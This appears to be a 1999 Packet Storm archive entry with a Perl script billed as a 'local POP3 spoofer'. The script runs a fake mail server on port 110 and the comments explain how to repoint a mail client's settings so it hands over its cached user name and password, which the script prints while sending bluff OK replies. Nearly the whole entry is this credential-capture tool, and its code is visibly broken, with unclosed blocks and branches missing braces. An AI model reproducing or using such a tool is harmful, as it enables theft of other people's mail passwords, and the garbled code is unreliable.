Type packetstorm
Reporter ManicX
Modified 1999-08-17T00:00:00


                                            `# This is a simple tcp server that listens on port 110  
# unless another is specified.   
# The possible uses of this are;  
# Netscape/explorer mail password caching/grabbing  
# In netscape edit your prefs.js file so that your pop  
# server is your own ip ( then open netscape  
# and click on get mail then this will capture the user.name  
# and password. (ps- dont edit your pop account in netscape  
# or it will erase the password and prompt for a new one)  
# I havent got explorer but the pop server can be changed in   
# the registry same should work for other email clients that  
# allow password caching.  
# Most of this coding was already in the /perl/eg/ folder  
# you can find the orginal version there ..   
print "===========================\n";  
print " Manicx local POP3 spoofer\n";  
print " www.infowar.co.uk/manicx/\n";  
print "===========================\n";  
($port) = @ARGV;  
$port = 110 unless $port; # Are port is 110 unless specified  
$AF_INET = 2;  
$sockaddr = 'S n a4 x8';  
($name, $aliases, $proto) = getprotobyname('tcp');  
if ($port !~ /^\d+$/) { ($name, $aliases, $port) = getservbyport($port, 'tcp');}  
print "Port = $port\n";  
$this = pack($sockaddr, $AF_INET, $port, "\0\0\0\0");  
select(NS); $| = 1; select(stdout);  
socket(S, $AF_INET, $SOCK_STREAM, $proto) || die "socket: $!";  
bind(S,$this) || die "bind: $!";  
listen(S,5) || die "connect: $!";  
select(S); $| = 1; select(stdout);  
print "Listening for connection....\n";  
($addr = accept(NS,S)) || die $!;  
print "Accept ok\n";  
($af,$port,$inetaddr) = unpack($sockaddr,$addr);  
@inetaddr = unpack('C4',$inetaddr);  
print NS "+OK manicx POP3 sniffer ready.\n";  
getuserandpass(); # call on our sub   
bluffothers(); # call on other sub  
sub bluffothers{  
$cmd = <NS>;   
print $cmd;  
$cmd =~ s/\s//g;  
if ($cmd eq 'STAT')   
print NS "+OK 0 0\n";  
print "Client wants STAT sent bluff message\n";  
elsif ($cmd eq 'QUIT')  
print "Client wants QUIT sent disconnect\n";  
print NS "+OK POP3 server closing connection\n";   
sleep 5; #so we dont have an error message in netscape  
print "Dont know what client wants sending bluff +ok\n";  
print NS "+OK\n";  
sub getuserandpass {  
$user = <NS>;  
$user =~ s/\s//g;   
if ($user eq 'AUTH')   
print NS "-ERR USER or QUIT\n";  
print "Client wants AUTH? Sent error message :)\n";  
print $user, "\n";  
print NS "+OK Pass\n";  
$pass = <NS>;  
print $pass;  
print NS "+OK Maildrop has 0 messages (0 octets)\n";  
# eek! recursion everywhere ...`